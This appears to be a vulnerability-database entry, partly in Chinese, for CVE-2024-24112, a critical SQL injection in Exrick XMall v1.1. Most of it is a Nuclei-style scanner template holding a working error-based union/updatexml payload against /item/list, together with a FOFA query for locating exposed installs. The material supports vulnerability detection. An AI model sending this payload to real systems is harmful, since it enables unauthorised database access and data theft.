CVE-2024-24112: Exrick XMall - SQL Injection

日期: 2025-08-01 | 影响软件: Exrick XMall | POC: 已公开

漏洞描述

XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.

PoC代码[已公开]

id: CVE-2024-24112

info:
  name: Exrick XMall - SQL Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.
  reference:
    - https://github.com/Exrick/xmall/issues/78
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24112
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-24112
    cwe-id: CWE-89
    epss-score: 0.81133
    epss-percentile: 0.99126
    cpe: cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: exrick
    product: xmall
    fofa-query: app="XMall-后台管理系统"
  tags: cve,cve2024,xmall,sqli

variables:
  num: "{{rand_int(9000000, 9999999)}}"

http:
  - raw:
      - |
        GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
          - "MySQLSyntaxErrorException"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022075deb359cbe469e74ec2301cc7e4c5562ff398bede0aaf7a6610f58ea6eca520022100fa029d48cd3290ec30cbc9666d1cffddc6701da8c6233e71f3e4c6be4a3f9d49:922c64590222798bb761d5b6d8e72950

相关漏洞推荐